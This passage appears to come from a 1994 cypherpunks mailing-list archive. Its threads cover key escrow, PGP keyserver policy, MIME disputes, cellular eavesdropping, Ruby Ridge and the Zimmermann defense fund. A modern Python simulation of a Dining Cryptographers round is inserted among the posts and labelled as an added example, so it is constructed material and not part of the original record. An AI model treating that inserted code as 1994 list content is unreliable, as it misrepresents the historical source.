Aldrich likes fast cars. 
Pablo buys Aldrich a fast car, in exchange for 8 or 10 keys, easily smuggled out on a floppy disk. Aldrich has just broken the law, and will doubtless be providing keys to Pablo for a very long time. Pablo, meanwhile, is laughing at the DEA agents, to whose daily phone meeting he listens. Plot B: There is no GAK. The DEA uses PGP, (having gotten copies from European FTP sites so as to not export it to its agents in South America.) The DEA agents hunting Pablo are the only ones with their keys. They know what Pablo does to DEA agents. Pablo can't get their keys, and our heroic agents catch Pablo, and throw him in jail forever. (Naturally, we can substitute any well funded enemy of law enforcement for Pablo. The KGB works well.) ******************* Second scenario. A group of terrorists plan to blow up the world trade center. Plot 1: Our terrorists are smart, and don't call attention to themselves. Despite the FBI's ability to tap their communications, there is no reason to be watching the soon-to-be terrorists, and they set off a bomb. Plot 2: For some reason, there is probable cause, leading to the issue of a warrant. The FBI taps into the communication lines, and discovers that the Terrorists are using VoicePGP. They obtain a warrant, and through the use of an ELINT monitoring device near the computer in question, get all the information they need. This scenario is different in that the terrorists are in locations known to the FBI, whereas Pablo does not know where the DEA agents are. If the location of the terrorists is not known, it is difficult to tap into their communications links. In closing, only by allowing end users to continue controlling their own security technology can you avoid creating a system where the interests of large blocks of users can be easily compromised. Adam Shostack -- "It is seldom that liberty of any kind is lost all at once." 
-Hume From warlord at MIT.EDU Fri Dec 16 13:38:53 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 16 Dec 94 13:38:53 PST Subject: KEYSRVR: tabula rasa? In-Reply-To: Message-ID: <9412162138.AA16688@toxicwaste.media.mit.edu> > Why is it possible for someone other than ME to add MY key to a keyserver? > I realize that at some point (perhaps only the first time you submit a > key?), there has to be some trust model employed, but it seems like this > anyone-can-submit-anyone-else's-key situation offers a very obvious attack: > anyone could propagate bogus keys across the net by just generating bogus > keys with someone else's email/name on them, leading to massive > impersonation problems. This has always been there. Many people consider it a feature. I like having the ability to tell a friend, who just signed my key, to just upload it to the keyserver, since the signature tends to do much more good being on the keyserver than being on my keyring. Also, because the keyserver uses PGP as a back end, it is possible to send multiple keys in a single message. You cannot do batch-processed incremental adds using PGP; if a keyfile contains multiple keys, there is no way to have a program only add specific additions. What about people who don't have email, or pseudonyms, or keys without email addresses? How do you deal with those, if you have to add your own key. And what about forged mail; I can easily send an email message claiming to be you. So what if I need to sign it? If I was creating a new key to spoof you, I _could_ sign it, and forge mail, and it would be added. So what? What does this buy you? Absolutely nothing! > Maybe I'm missing something obvious, but it seems like there should be a > more rigorous method available to, and employed by, keyserver operators for > verifying someone's identity before accepting a key submitted (supposedly) > by them. 
Shouldn't the key submission msg itself at minimum be required to > be contained within a signed msg from someone with enough "nearness" in > trust levels from some trusted introducer known to the keyserver op? I > thought this sort of situation was precisely the reason for the trust level > system in PGP in the first place. You are definitely missing something obvious! I will absolutely not do what you suggest here; I refuse. If you want rigorous key verifications then move into a PEM strict hierarchy (which I will perfectly well admit has its uses) or patronize the SLED database people, who will do what you want. What I want to provide with my keyserver is an easy way for anyone to distribute a PGP key easily. I don't care who you are, what you believe in, or what you want to accomplish, but if you want to let people have your PGP key, I want it on my server so others can get it. I think that many of the other keyserver operators believe as I do -- the role of a keyserver is key distribution, not key verification. Key verification is done very well in PGP itself. The method is called SIGNING A KEY. If you want to verify a key, check the signatures on it. This is exactly what the web of trust is about. If you trust me to sign keys, then you will trust the keys I've signed. If you don't trust me, then my signatures mean nothing. But you should never trust a key from the keyserver just because you obtained it from a keyserver. That's just plain stupid. > This may be a can of worms (or not), but if cpunks require fairly decent > methods for verifying the identities of people who want to trade keys with > them personally, then it seems keyservers should require at LEAST that > level of verification (or better). Again: ABSOLUTELY NOT! Keyservers are open to everyone; all comers welcome. Everyone from "Pr0duct Cypher" to "BlackNet" to "Jeffrey I. Schiller " is welcome to put their key on the keyservers. 
Again, there is a very big difference (which you clearly do not comprehend) between key distribution and key verification. The keyservers ONLY do the former, and you should do the latter. Doing otherwise is, as I said, stupid. > There doesn't seem to be any elegant mechanism available for doing this > yet, but I'm ready to be educated on this point. Any comments? Just add your new key to the keyservers and have people start using it. Life goes on. You are not the first to be in this situation, and you definitely will not be the last. I hope I've given you some insight. -derek Derek Atkins, SB '93 MIT EE, G MIT Media Laboratory Member, MIT Student Information Processing Board (SIPB) Home page: http://www.mit.edu:8001/people/warlord/home_page.html warlord at MIT.EDU PP-ASEL N1NWH PGP key available From tedwards at src.umd.edu Fri Dec 16 13:43:58 1994 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 16 Dec 94 13:43:58 PST Subject: Dining Cryptographers test bed client for IRC In-Reply-To: <9412161623.AA23186@chaos.intercon.com> Message-ID: I wrote up a short "test bed" for Dining Cryptographers over IRC (Internet Relay Chat). The implementation is not secure, as it uses PRIVMSGs to exchange flips between neighbors, but some good soul with a bit of time could go in and add DES encryption to them. The client allows for anonymous roundtable discussion between clients on a single IRC channel. The key-sharing graph is a ring, so it only takes two to collude to find what a particular person is sending, but that can be expanded also. There is no collision detection, but it is usually pretty obvious (i.e. if you send something and don't get it back, you know a collision happened). I also included a paper which has some discussion and references to making the DC implementation better, including things like protection against attacks coming from the IRC server itself, protection against someone sending stuff all the time disallowing service, etc. 
This has all been put in the cypherpunks ftp incoming directory. -Thomas From shamrock at netcom.com Fri Dec 16 14:32:13 1994 From: shamrock at netcom.com (Lucky Green) Date: Fri, 16 Dec 94 14:32:13 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: L. McCarthy wrote: >Right. We went through dozens of messages to establish that some people like >MIME and others don't, just as we did several weeks ago. What a surprise that >not much has changed since then. Bleeding wonderful. And we will go through it again and again and again until the ones who don't like MIME wake up to the fact that MIME is essential for today's and tomorrow's email messages, namely solid email encryption that doesn't require much user intervention. Regardless what machine you use and what part of the net you live on. >Good standards are good. There's a revelation. Yep, we sure needed dozens of >messages to rehash that. Right. I agree it shouldn't take dozens of messages to get people to accept that. I have no idea why anyone who followed these threads still won't accept that MIME is a Good Thing and that MIME capable mailers (no mailers that claim to be MIME capable and aren't) are a Good Thing as well. >> > > Everything that has happened with MIME will happen again when people >> > > try to add cryptography to the structure of the net. >> > It seems to me that people are *already* trying to add cryptography to the >> > structure of the net, and that would actually be worth discussing. >> Yeah, like the PGP-MIME draft, which will open up the ability to >> effectively use PGP to more people than anything the cypherpunks have ever >> done :) > >So why not talk about that instead ? But we have. And every time we do, someone out there says: "But my mailer doesn't even handle today's MIME'd messages right. So it won't do tomorrow's either." Why do you think this thread keeps coming back? -- Lucky Green PGP encrypted mail preferred. 
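The Dining Cryptographers round that Thomas Edwards's message above describes (ring key-sharing graph, no collision detection, two neighbors able to collude), as an added example that is not his IRC client. The function names, the 16-byte slot and the sample messages are assumptions, and the shared flips come from a local random source instead of being exchanged over PRIVMSG.

```python
"""One round of a Dining Cryptographers net on a ring (constructed example)."""
import secrets
from functools import reduce

SLOT_LEN = 16  # assumed slot size in bytes; every announcement has this length


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pad_message(msg: bytes) -> bytes:
    """Zero-pad a message to the slot size (an all-zero slot means silence)."""
    if len(msg) > SLOT_LEN:
        raise ValueError("message does not fit in one slot")
    return msg.ljust(SLOT_LEN, b"\0")


def dc_round(messages):
    """Run one round. messages[i] is bytes to send, or None to stay silent.

    Returns (announcements, pads, result). pads[i] is the secret shared by
    participant i and participant i+1 on the ring (the "coin flips").
    """
    n = len(messages)
    if n < 3:
        raise ValueError("a ring needs at least three participants")
    pads = [secrets.token_bytes(SLOT_LEN) for _ in range(n)]
    announcements = []
    for i, msg in enumerate(messages):
        # Each participant XORs the two pads it shares with its neighbors;
        # pads[i - 1] wraps around the ring when i == 0.
        out = xor_bytes(pads[i - 1], pads[i])
        if msg is not None:
            out = xor_bytes(out, pad_message(msg))
        announcements.append(out)
    # Every pad appears in exactly two announcements, so all pads cancel and
    # only the XOR of the messages that were sent remains.
    result = reduce(xor_bytes, announcements)
    return announcements, pads, result


def delivered(msg: bytes, result: bytes) -> bool:
    """Sender-side check: the round output equals what I sent, so nobody
    else transmitted in the same round (no collision)."""
    return result == pad_message(msg)


def neighbors_unmask(announcements, pads, i):
    """What the two ring neighbors of participant i learn by pooling the pads
    they share with i: that participant's slot content (zeros if silent)."""
    left_pad, right_pad = pads[i - 1], pads[i]
    return xor_bytes(xor_bytes(announcements[i], left_pad), right_pad)


if __name__ == "__main__":
    # Constructed sample: five participants, only participant 1 sends.
    ann, pads, result = dc_round([None, b"meet at noon", None, None, None])
    print("round output:", result.rstrip(b"\0"))
    print("neighbors of 1 recover:", neighbors_unmask(ann, pads, 1).rstrip(b"\0"))

    # Two senders in one round: the output is the XOR of both messages, and
    # each sender notices only because its own text did not come back.
    _, _, clash = dc_round([b"alpha", None, b"bravo", None])
    print("collision seen by sender 0:", not delivered(b"alpha", clash))
```

A denser key-sharing graph raises the number of participants who must collude before one sender's slot can be unmasked; the ring is the minimum, which is why two suffice here.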
From jamesd at netcom.com Fri Dec 16 15:21:34 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 16 Dec 94 15:21:34 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) In-Reply-To: Message-ID: L. McCarthy wrote: > >Right. We went through dozens of messages to establish that some people like > >MIME and others don't, just as we did several weeks ago. What a surprise that > >not much has changed since then. Bleeding wonderful. On Fri, 16 Dec 1994, Lucky Green wrote: > And we will go through it again and again and again until the ones who > don't like MIME wake up to the fact that MIME is essential for today's and > tomorrow's email messages. Well it certainly is not essential for today's messages. Drop into alt.binaries.pictures.* When the news people wish to transmit pictures of naked girls, etc, they do not use MIME. Now maybe they should use MIME, and maybe they will use MIME in the future, but today, MIME is still bleeding edge. If you want to fix that, start programming instead of shooting the messenger. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From anonymous-remailer at shell.portal.com Fri Dec 16 15:27:56 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 16 Dec 94 15:27:56 PST Subject: Tim May the Luddite Message-ID: <199412162327.PAA28290@jobe.shell.portal.com> Lucky Green wrote: > I don't see any cheap shots or personal innuendos. Perhaps you missed McCoy's "fucking clueless" post? 
From anonymous-remailer at shell.portal.com Fri Dec 16 15:31:56 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 16 Dec 94 15:31:56 PST
Subject: Amanda and MIME
Message-ID: <199412162331.PAA28546@jobe.shell.portal.com>

>> I think if we only use MIME, the quality of discussion on the list
>> would skyrocket. Eric, you should block all non-MIME posts to the
>> list. How could we have been so blind?

>Perry wrote:
>The anonymous poster should feel happy he's anonymous, as his posting
>is embarrassingly stupid. Perhaps he'd like to make fun of ASCII next
>by posting his next message as sequences of octal digits.

Ah, a vintage Perry post: full of insults, little discussion. Perry is unable to handle SARCASM. Perhaps better MIME software will help.

From abostick at netcom.com Fri Dec 16 15:54:40 1994
From: abostick at netcom.com (Alan Bostick)
Date: Fri, 16 Dec 94 15:54:40 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <9412161424.AA02172@snark.imsi.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <9412161424.AA02172 at snark.imsi.com>, you wrote:
>
> Timothy C. May says:
> > My issue has not been with MIME as a transport mechanism, but
> > non-ASCII content, which clearly most folks can't read.
>
> Far from clear, Tim. Last time I checked, almost no one I communicated
> with regularly was using a machine without a pixmapped display. That
> means that all standing in the way of them being able to read
> non-ascii is the right font sitting on disk, and a program that groks
> it.

The right font on disk and a program that groks it. Aye, there's the rub.

What makes this debate at once so fascinating and so frustrating is that both sides are correct. Yes, MIME is the standard that has emerged for exchanging non-ascii-text data via email, and yes it's a damned good one, properly implemented.
And yes, anyone with the resources to do so ought to connect to their Internet service provider through a SLIP connection and be able to move through the Web with a good graphical browser and view their mail through their MIME-compliant mail program. If you can do it, then it is without a doubt the way to go.

But at the same time Tim is right, too. SLIP connections, quality Web browsers, and MIME-compliant email packages are the high end of Net access today. They demand either an investment of money (intelligently spent) or an investment of effort to get the stuff up and running and to get the know-how needed to do so. Either of these can be more than many people who are now Internet users can afford.

I think the people who are berating Tim for his apparent stubbornness should stop and think for a bit. It's not a simple matter of "We're right, so Tim must be wrong." The people who can look at the matter and see how the MIME advocates and Tim May are both right, without seeing a contradiction, will have a broader, deeper insight into the underlying problems, and be able to come up with solutions that reach farther.

                               | For me, to be a feminist is to answer the
Alan Bostick                   | question "Are women human?" with a yes.
abostick at netcom.com        |
finger for PGP public key      | Katha Pollitt, REASONABLE CREATURES
Key fingerprint:               |
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79
+legal_kludge=off

From shamrock at netcom.com Fri Dec 16 16:54:43 1994
From: shamrock at netcom.com (Lucky Green)
Date: Fri, 16 Dec 94 16:54:43 PST
Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!)
Message-ID:

L. McCarthy wrote:
[regarding MIME]
>Well it certainly is not essential for today's messages.
>
>Drop into alt.binaries.pictures.*
>
>When the news people wish to transmit pictures of naked girls, etc,
>they do not use MIME
>
>Now maybe they should use MIME, and maybe they will use MIME in
>the future, but today, MIME is still bleeding edge.

I have dropped into alt.binaries.*. Thanks to my newsreader (freeware), the pictures there are a _mouseclick_ away from my harddrive. Even multi-part posts take ONE mouseclick. MIME isn't even needed here. Capable clients are. And they are available today. All I am asking is that people start using them instead of complaining how difficult it is to do things on the net.

--Lucky [who promises to shut up -- for now]

From lmccarth at ducie.cs.umass.edu Fri Dec 16 17:22:30 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Fri, 16 Dec 94 17:22:30 PST
Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!)
Message-ID: <199412170127.UAA21542@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Lucky Green writes:
> L. McCarthy wrote:
> [regarding MIME]

Note that James Donald actually wrote this quoted text, not I:

> >Well it certainly is not essential for today's messages.
> >
> >Drop into alt.binaries.pictures.*
> >
> >When the news people wish to transmit pictures of naked girls, etc,
> >they do not use MIME
> >
> >Now maybe they should use MIME, and maybe they will use MIME in
> >the future, but today, MIME is still bleeding edge.

Lucky Green writes:
> I have dropped into alt.binaries.*. Thanks to my newsreader (freeware), the
> pictures there are a _mouseclick_ away from my harddrive. Even multi-part
> posts take ONE mouseclick.

Can you recommend an ftp site for this ? I'll try to get my sysadmins to install it here. (Assuming it's a Unix app.) What is it called ?

- - -L.
Futplex McCarthy, who likes MIME but is unhappy that his mailer does not properly support it

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From pfinerty at seattleu.edu Fri Dec 16 17:56:11 1994
From: pfinerty at seattleu.edu (Patrick J. Finerty Jr.)
Date: Fri, 16 Dec 94 17:56:11 PST
Subject: VAX pgp uploaded to the cypherpunks site.
Message-ID:

i have uploaded pgp compiled for a VAX running VAX/VMS to the cypherpunks ftp site. here is a copy of the readme file i included with it.

i should note that the reason i did this was primarily to provide pgp to people who do not have access to c compilers or a PC/DOS machine. this is, of course, not meant to substitute for checking the source and compiling pgp yourself.

-----BEGIN PGP SIGNED MESSAGE-----

VAXPGP262.TAR.Z is a compressed tar file containing the following docs.

NOTE!! - this is _not_ a complete pgp distribution. only the following files are included!
- -------------------------------------------------------------
APPNOTE.DOC;1         13/15     25-OCT-1994 10:30:52.79
BLURB.TXT;1            2/3      25-OCT-1994 10:30:31.21
CHANGES.DOC;1         41/42     25-OCT-1994 10:30:53.63
CONFIG.TXT;1           8/9      25-OCT-1994 10:30:23.93
KEYS.ASC;1            12/12     25-OCT-1994 10:30:56.06
KEYSERV.DOC;1          9/9      25-OCT-1994 10:30:31.52
LANGUAGE.TXT;1       135/135    25-OCT-1994 10:30:56.56
MITLICEN.TXT;1         5/6      25-OCT-1994 10:31:00.64
PGFORMAT.DOC;1        72/72     25-OCT-1994 10:30:47.91
PGP.1;1               40/42     25-OCT-1994 10:30:50.14
PGP.EXE;1            326/327    25-OCT-1994 10:58:19.24
PGP.HLP;1              8/9      25-OCT-1994 10:31:00.99
PGPDOC1.TXT;1        164/165    25-OCT-1994 10:30:41.65
PGPDOC2.TXT;1        262/264    25-OCT-1994 10:30:33.21
POLITIC.DOC;1         35/36     25-OCT-1994 10:30:51.42
PUBRING.PGP;1         28/30      5-DEC-1994 23:42:21.16
README.DOC;1          13/15     25-OCT-1994 10:31:01.51
SETUP.DOC;2           32/33     25-OCT-1994 10:30:32.07
- -------------------------------------------------------------

PGP.EXE is pgp2.6.2. compiled on a VAX running VAX/VMS 5.5-2. i compiled the program using the *build.com files that come with the standard pgp distribution BUT with TWO CHANGES. THESE CHANGES HAVE NO EFFECT ON PGP, THEY ONLY AFFECT THE CREATION OF THE RSA LIBRARY THAT IS DISTRIBUTED WITH PGP!!

changes were made to the rsabuild.com file, these were:

1) commented out: $ call compile md2c
2) commented out: $ call compile md5c

other than these, no changes were made to the *.com files.

i have tested this copy of pgp and it has worked perfectly with key generation and file signing as measured by generating keys on the VAX and then signing a file on the VAX followed by checking the signatures and key on a SUN using pgp2.6.2 that was compiled there.

if you have a problem, please write me at:

finerty at msscc.med.utah.edu
pfinerty at nyx10.cs.du.edu
pfinerty at seattleu.edu

my pgp key is available via keyserver or finger.

- -patrick finerty, jr.
- -- patrick finerty -- finerty at msscc.med.utah.edu pfinerty at bach.seattleu.edu pfinerty at nyx10.cs.du.edu
U of Utah biochem grad student/slave in the Bass lab
easily found at (801) 585-3110 almost anytime. rm 207 wintrobe.

-- patrick finerty -- finerty at msscc.med.utah.edu pfinerty at bach.seattleu.edu pfinerty at nyx10.cs.du.edu
U of Utah biochem grad student/slave in the Bass lab
easily found at (801) 585-3110 almost anytime. rm 207 wintrobe.

From mellswor at firewall.nielsen.com Fri Dec 16 18:07:32 1994
From: mellswor at firewall.nielsen.com (Mike Ellsworth)
Date: Fri, 16 Dec 94 18:07:32 PST
Subject: FV & PGP (was Re: First Virtual email security)
Message-ID: <199412170212.VAA21903@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

James D. Wilson said:
>
>On Thu, 15 Dec 1994 nsb at nsb.fv.com wrote:
>
>> Moreover, if we supported PGP today, we might indirectly lend
>> credibility to what we perceive as the incorrect belief that
>> cryptography is NECESSARY for commerce. Because we see cryptography as
>> helpful, but not necessary, we aren't going to support PGP right away,
>> but will probably add such support when a large enough portion of our
>> customer base wants it and can make use of it.
>
>Without cryptography how exactly are you going to protect my credit card
>numbers from sniffer-snoopers and crackers? Either you will send the
>credit card text in the clear, or it will be encrypted somehow. Or perhaps
>you will have customers call you over the phone to give you their credit
>card info?

I would also like to be convinced on this point. It seems that it's an either/or. Either the info is in the clear, and thus vulnerable, or it's encrypted, and safer.
- -------------------------------------
Mike Ellsworth
mellswor at firewall.nielsen.com
I find television very educating. Every time somebody turns on the set, I go into the other room and read a book.
Groucho Marx (1890-1977)
I'd be foolish to speak for my employer, now, wouldn't I?
- -------------------------------------

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From avi at clas.ufl.edu Fri Dec 16 20:25:05 1994
From: avi at clas.ufl.edu (Avi Baumstein)
Date: Fri, 16 Dec 94 20:25:05 PST
Subject: rehash of fbi v. weaver, or 'freeh is a jerk'
Message-ID: <1326.avi@clas.ufl.edu>

i happen to be on the road in tennessee, and read this editorial in the knoxville news-sentinel. i don't remember seeing anything about this when it happened...but since freeh and the fbi seem to be disliked these days, here's some more fodder for the fire.

-avi

ps - hopefully this isn't a repeat, but being on the road, i'm mail-delayed at least 24 hours.

The Knoxville News-Sentinel, Dec 16, 1994, pA16

DISTURBING SILENCE
-FBI chief taking his time acting on report about Idaho shootout

All eyes are on Louis Freeh, director of the Federal Bureau of Investigation, as he ponders disciplinary action in the infamous shootout at Ruby Ridge, Idaho, in 1992. This being the end of 1994, one starts to wonder what is taking the director so long.

Excessive use of force by the FBI is no trivial matter. Citizens might gather from the Idaho case that the government claims special license to abuse the rights of loners with extremist views.
It is a year and a half already since the government made a fool of itself by trying Randy Weaver and Kevin Harris for murder in the death of a deputy US marshal. The jury sided with the defendants, and the US district judge said 75 percent of the evidence and testimony presented by the prosecution had aided the defense.

But to go back to the beginning, Weaver, a former Green Beret, was a member of the Christian Identity sect and a racial separatist. He had retreated with his wife and children to a remote mountain cabin, where they and their young friend Harris lived.

Weaver's first run-in with the law was induced by undercover agents. They offered to buy two shotguns from him if he sawed off the barrels, making the weapons illegal. He did so, and they arrested him. He failed to show up for trial, though the government later was forced to admit that he was given the wrong court date.

Then began 20 months' surveillance of the Weaver cabin. On Aug. 21, 1992, the Weavers' dog discovered several agents camouflaged in the woods. The agents shot the dog. In the ensuing exchange of fire, 14-year-old Sam Weaver was killed by a bullet in the back, and Harris shot the deputy -- in self-defense, he said.

The next day, the agents returned, reinforced by the 50-member Hostage Rescue Team. The commander of the HRT never attempted to interview the agents who survived the first encounter. Also, the FBI's policy on use of deadly force was relaxed: Instead of firing if lives were in danger, agents were ordered to shoot any armed adult at the scene.

Thus was the stage set for final tragedy. An FBI marksman fired at Weaver and Harris outside the cabin. Both men were wounded, and Weaver's wife was killed, standing inside the cabin with her baby in her arms.

A 542-page Justice Department report was completed last April. It has not been released. Director Freeh's disturbing silence is compounded by his promotion last week of the agent who had overall responsibility for the Weaver operation.
What conclusion would Freeh recommend the public draw, if not that a federal government willing enough to jail overzealous Los Angeles policemen will arrogantly circle the wagons to protect its own?

From die at pig.die.com Fri Dec 16 20:59:18 1994
From: die at pig.die.com (Dave Emery)
Date: Fri, 16 Dec 94 20:59:18 PST
Subject: Digital privacy
In-Reply-To: <9412161623.AA23186@chaos.intercon.com>
Message-ID: <9412170458.AA07961@pig.die.com>

> > > >processed, it's >less likely that anyone could eavesdrop on
> > >your conversations.
> > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >
> > ?Como? This is absolutely amazing!

Amanda Walker writes:
>
> Well, it is true, from a pragmatic point of view. A neighborhood kid with a
> Radio Shack scanner can't listen in on digital cellular calls. You have to
> actually hack a phone, which is a much less prevalent skill.

Both TDMA and CDMA cellular use digital echo suppressors which means that a simple hacked phone will only recover the base (landline) end of the conversation - almost all traces of the mobile end of the conversation will be eliminated by these DSP devices which are required to eliminate the otherwise very noticeable echo due to the O(100 ms) delays of the vocoders used.

Recovering the mobile end of a nearby call which is usually easy with FM analog cellular (AMPS and NAMPS) and a scanner, and usually unnecessary anyway due to the low return loss (high echo) of the wireline trunks and switches which makes the mobile caller's voice clearly audible on the base station transmission, will not be possible for either CDMA or TDMA using a hacked phone as both systems use more or less entirely different modulations and transmission techniques in the mobile to base direction. These modulations cannot be recovered by simply hacking the firmware of a phone - they require different signal processing electronics.
And CDMA uses strict power control in the mobile to base direction which ensures that much of the time the mobile signal will be well below the threshold of detectability at a listening post located anywhere but very near the caller.

>
> I still think that CDMA+DES is the way to go for secure cellular, but from a
> purely pragmatic point of view simply going digital does increase privacy.

It greatly increases privacy against casual snooping, but of course does very little to protect against the kind of serious threat that both the TLA's (ours and theirs) and large criminal and industrial spy operations pose. As such it may lead people to be more careless because they have never seen the risk of cell call interception demonstrated and delude themselves into believing it is not possible. I hope that what interception is possible with hacked phones becomes widely visible so the illusion of security is not regained when the digital switch happens.

And of course I repeat old news when I point out that the NSA and other TLA's have been quietly fighting a battle for years to keep cellphones from using effective encryption, and have so far blocked it out of the standards.

> Using analog cellular is like using a walkie-talkie.

Against serious threats, using any clear phone is like using a walkie talkie. Against nosey neighbors using an analog cellphone is of course not advisable for any kind of private conversation. It is certainly true that most people are much more threatened by their nosey neighbors than serious spies, however, and so digital cellphones will make calls much more private for ordinary people.

Dave Emery N1PRE
die at die.com

From pfarrell at netcom.com Fri Dec 16 21:19:53 1994
From: pfarrell at netcom.com (Pat Farrell)
Date: Fri, 16 Dec 94 21:19:53 PST
Subject: Tim May the Luddite--His Last Message for A While
Message-ID: <922.pfarrell@netcom.com>

> It may be time for me to move on. More than 2 years on this list,
> since the B.C. period, may be too long.
I've been thinking the same thing. Sadly, some of the initial C'punks are those that are among the worst flamers. Eric and Perry should be leading by example, but that isn't the case.

Recently, I was encouraged by the number of outsiders willing to post. The folks from Netscape were just the most recent. But they were greeted with massive hostility because their code isn't perfect, or maybe because they are trying to make a buck. Sometimes releasing code sooner means that you will be around later to fix it.

Even Amanda, who I first saw posting to comp.fonts when she worked for Visix, has not been showing her usual diplomacy.

Cypherpunks write code, and care about politics, technology, society and economics. Cypherpunks will continue. I'm not so sure about the cypherpunks list. I'm not willing to bet that it will be different than Extropians.

Pat

Pat Farrell      Grad Student                 pfarrell at cs.gmu.edu
Department of Computer Science    George Mason University, Fairfax, VA
Public key available via finger          #include

From hmiller at orion.it.luc.edu Fri Dec 16 22:02:27 1994
From: hmiller at orion.it.luc.edu (Hugh Miller)
Date: Fri, 16 Dec 94 22:02:27 PST
Subject: Revised - Zimmermann Defense Fund Appeal
Message-ID: <9412170602.AA35876@orion.it.luc.edu>

Tom Bryce at Duke (thanks, Tom!) has pointed out an important erratum in my original fundraising post. I mistakenly gave out Phil Dubois's net.address as "dubois at csm.org". This is WRONG: the correct address is:

    dubois at csn.org

I apologize for the error. Since the post was signed, and just patching it will mung the md5 hash, I have included the whole message below. If you are reposting the message to other outlets, please use this new revision (version 1.1!) instead.

Also, Irving Wolfe (thanks, Irving!) wrote me to suggest that persons interested in donating to Phil's defense fund might like to see some bona fides of my (and Phil Dubois's) relation to Phil Zimmermann, to insure that the money donated is going where we say it is.
I've included something which (I hope) might go some way towards addressing this concern in the revised post too.

Best wishes for a Happy Holidays to all on the Net (and off)!

----------------------->% CUT HERE %<-------------------------

-----BEGIN PGP SIGNED MESSAGE-----

Phil Zimmermann Legal Defense Fund Appeal

In November, 1976, Martin Hellman and Whitfield Diffie announced their discovery of public-key cryptography by beginning their paper with the sentence: "We stand today on the brink of a revolution in cryptography."

We stand today on the brink of an important battle in the revolution they unleashed. Philip Zimmermann, who encoded and released the most popular and successful program to flow from that discovery, Pretty Good Privacy ("PGP"), may be about to go to court.

It has been over fourteen months now since Phil was first informed that he was the subject of a grand jury investigation being mounted by the San Jose, CA, office of US Customs into the international distribution, over the Internet, of the original version of the program. On January 12th, Phil's legal team will meet for the first time with William Keane, Assistant US Attorney for the Northern District of California, who is in charge of the grand jury investigation, in San Jose. An indictment, if one is pursued by the government after this meeting, could be handed down very shortly thereafter.

If indicted, Phil would likely be charged with violating statute 22 USC 2778 of the US Code, "Control of arms exports and imports." This is the federal statute behind the regulation known as ITAR, "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of the Code of Federal Regulations. Specifically, the indictment would allege that Phil violated 22 USC 2778 by exporting an item listed as a "munition" in 22 CFR 120.1 et seq. without having a license to do so. That item is cryptographic software -- PGP.

At stake, of course, is far more than establishing whether Phil violated federal law or not.
The case presents significant issues and will establish legal precedent, a fact known to everyone involved. According to his lead counsel, Phil Dubois, the US government hopes to establish the proposition that anyone having anything at all to do with an illegal export -- even someone like Phil, whose only involvement was writing the program and making it available to US citizens and who has no idea who actually exported it -- has committed a federal felony offense. The government also hopes to establish the proposition that posting a "munition" on a BBS or on the Internet is exportation.

If the government wins its case, the judgment will have a profound chilling effect on the US software industry, on the free flow of information on the emerging global networks, and in particular upon the grassroots movement to put effective cryptography in the hands of ordinary citizens. The US government will, in effect, resurrect Checkpoint Charlie -- on the Information Superhighway.

By now, most of us who are reading this know about Phil and the case, whether by having the program and reading the doc files or by seeing reports in the Wall Street Journal, Time, Scientific American, the New York Times, Wired, US News and World Report, and hundreds of other news outlets; on Usenet groups like talk.crypto.politics or alt.security.pgp; or by listening to Phil give talks such as the one he gave at CFP '94 in Chicago. We know that PGP has made great strides since version 1.0, and is now a sophisticated encryption and key-management package which has become the de facto standard in both micro and mainframe environments. We know that Phil and the PGP development team successfully negotiated a commercial license with Viacrypt, and, through the efforts of MIT, a noncommercial license for PGP with RSA Data Security, the holders of the patent on the RSA algorithm on which PGP is based, thus freeing the program from the shadow of allegations of patent infringement.
We know that programs such as PGP represent one of our best bulwarks in the Information Age against the intrusions of public and private information gatherers. We know that PGP is a key tool in insuring that the "Information Superhighway" will open the world to us, without opening us to the world.

What we may not all know is the price Phil has had to pay for his courage and willingness to challenge the crypto status quo. For years now Phil has been the point man in the ongoing campaign for freely available effective cryptography for the everyday computer user. The costs, personal and professional, to him have been great. He wrote the original code for PGP 1.0 by sacrificing months of valuable time from his consulting career and exhausting his savings. He continues to devote large amounts of his time to testifying before Congress, doing public speaking engagements around the world, and agitating for "cryptography for the masses," largely at his own expense. He is now working, still for free, on the next step in PGP technology, PGP Phone, which will turn every PC with a sound card and a modem into a secure telephone. And we know that, just last month, he was searched and interrogated in the absence of counsel by US Customs officials upon his return from a speaking tour in Europe.

Phil's legal team consists of his lead counsel, Philip Dubois of Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in Washington, DC, first counsel for intelligence policy for the Justice Department under President Carter; Eben Moglen, professor of law at Columbia and Harvard Universities; Curt Karnow, a former assistant US attorney and intellectual property law specialist at Landels, Ripley & Diamond in San Francisco; and Thomas Nolan, noted criminal defense attorney in Menlo Park.

While this is a stellar legal team, what makes it even more extraordinary is that several of its members have given their time for free to Phil's case.
